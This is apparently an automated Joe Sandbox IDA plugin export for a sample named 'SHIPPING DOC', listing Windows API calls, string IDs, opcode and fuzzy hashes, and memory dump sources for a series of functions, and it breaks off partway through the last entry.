                                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                                      • API String ID: 3038501623-2263619337
                                                                                                                      • Opcode ID: c1d1e427df81d364f3e7315beb2c85998febd91a9edec5b390063b37ecf0eef7
                                                                                                                      • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                                                      • Opcode Fuzzy Hash: c1d1e427df81d364f3e7315beb2c85998febd91a9edec5b390063b37ecf0eef7
                                                                                                                      • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                      • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                                      • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                                      • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                                      • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                      • API String ID: 2295938435-8599901
                                                                                                                      • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                      • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                                      • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                      • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                                      APIs
                                                                                                                      • timeGetTime.WINMM ref: 00443B67
                                                                                                                        • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                                      • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                                      • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                                                                                      • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                                      • IsWindow.USER32(00000000), ref: 00443C3A
                                                                                                                      • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                                                                                        • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                        • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                        • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                      • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                                      • String ID: BUTTON
                                                                                                                      • API String ID: 1834419854-3405671355
                                                                                                                      • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                      • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                                      • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                      • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                                      APIs
                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                                      • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                      • _wprintf.LIBCMT ref: 00454074
                                                                                                                      • __swprintf.LIBCMT ref: 004540A3
                                                                                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                      • API String ID: 455036304-4153970271
                                                                                                                      • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                      • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                                      • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                      • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                                      APIs
                                                                                                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                                      • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                                      • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                                      • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                                      • _memmove.LIBCMT ref: 00467EB8
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                                      • _memmove.LIBCMT ref: 00467F6C
                                                                                                                      • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                        • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                        • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                                        • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                      • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2170234536-0
                                                                                                                      • Opcode ID: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
                                                                                                                      • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                                                      • Opcode Fuzzy Hash: ee399615404d7bb1bafc861e07f1b5ddd683e7781e6b5cedfe79e56e9046232f
                                                                                                                      • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                                      • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                                      • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                                      • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                                      • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                                      • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                                      • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                                      • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                                      • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                                      • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                                      • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                                      • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: State$Async$Keyboard
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 541375521-0
                                                                                                                      • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                      • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                                      • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                      • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                                      APIs
                                                                                                                      • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                                      • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                                      • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                                      • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                                      • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3096461208-0
                                                                                                                      • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                      • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                                      • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                      • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                                                                                                      APIs
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                                                                                                      • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                                                                                                      • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                                                                                                      • DeleteObject.GDI32(?), ref: 0047151E
                                                                                                                      • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                                                                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                                                                                                      • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                                                                                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                                                                                                      • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                                                                                                      • DeleteObject.GDI32(?), ref: 004715EA
                                                                                                                      • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3218148540-0
                                                                                                                      • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                      • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                                                                                                      • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                                                                                                      • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 136442275-0
                                                                                                                      • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                      • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                                                                                                      • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                                                                                                      • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                                                                                                      APIs
                                                                                                                      • _wcsncpy.LIBCMT ref: 00467490
                                                                                                                      • _wcsncpy.LIBCMT ref: 004674BC
                                                                                                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                                                                                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                                                                                                      • _wcstok.LIBCMT ref: 004674FF
                                                                                                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                                                                                                      • _wcstok.LIBCMT ref: 004675B2
                                                                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                                                                                                      • _wcslen.LIBCMT ref: 00467793
                                                                                                                      • _wcscpy.LIBCMT ref: 00467641
                                                                                                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                      • _wcslen.LIBCMT ref: 004677BD
                                                                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                                                                                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                      • String ID: X
                                                                                                                      • API String ID: 3104067586-3081909835
                                                                                                                      • Opcode ID: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                                                                      • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                                                                                                      • Opcode Fuzzy Hash: eb9283ffadc70d7ae5f0b14c33a6b36f7734343f68681e5f3ce0481c1d9d9f7d
                                                                                                                      • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                                                                                                      APIs
                                                                                                                      • OleInitialize.OLE32(00000000), ref: 0046CBC7
                                                                                                                      • CLSIDFromProgID.OLE32(?,?), ref: 0046CBDF
                                                                                                                      • CLSIDFromString.OLE32(?,?), ref: 0046CBF1
                                                                                                                      • CoCreateInstance.OLE32(?,?,00000005,00482998,?), ref: 0046CC56
                                                                                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 0046CCCA
                                                                                                                      • _wcslen.LIBCMT ref: 0046CDB0
                                                                                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 0046CE33
                                                                                                                      • CoTaskMemFree.OLE32(?), ref: 0046CE42
                                                                                                                      • CoSetProxyBlanket.OLE32(?,?,?,?,?,?,?,00000800), ref: 0046CE85
                                                                                                                        • Part of subcall function 00468070: VariantInit.OLEAUT32(00000000), ref: 004680B0
                                                                                                                        • Part of subcall function 00468070: VariantCopy.OLEAUT32(00000000,00479A50), ref: 004680BA
                                                                                                                        • Part of subcall function 00468070: VariantClear.OLEAUT32 ref: 004680C7
                                                                                                                      Strings
                                                                                                                      • NULL Pointer assignment, xrefs: 0046CEA6
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271944414.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271955885.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271982448.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_SHIPPING DOC.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$CreateFromInitializeInstance$BlanketClearCopyFreeInitProgProxySecurityStringTask_wcslen
                                                                                                                      • String ID: NULL Pointer assignment
                                                                                                                      • API String ID: 440038798-2785691316
                                                                                                                      • Opcode ID: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                      • Instruction ID: 7aab634462a7dbcbf958abac95e41bd58996b502d0213671d322085b5631b432
                                                                                                                      • Opcode Fuzzy Hash: 58df38d68bb8b0de8b452a242e06650ce93d7fbbb76e65ad7c2ec0be56c62684
                                                                                                                      • Instruction Fuzzy Hash: 74B13FB1D00229AFDB10DFA5CC85FEEB7B8EF48700F10855AF909A7281EB745A45CB95
                                                                                                                      APIs
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                                                                                                      • _wcslen.LIBCMT ref: 004610A3
                                                                                                                      • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                                                                                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                                                                                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00461248
                                                                                                                        • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1271877399.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1271865192.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271915891.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1271930798.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
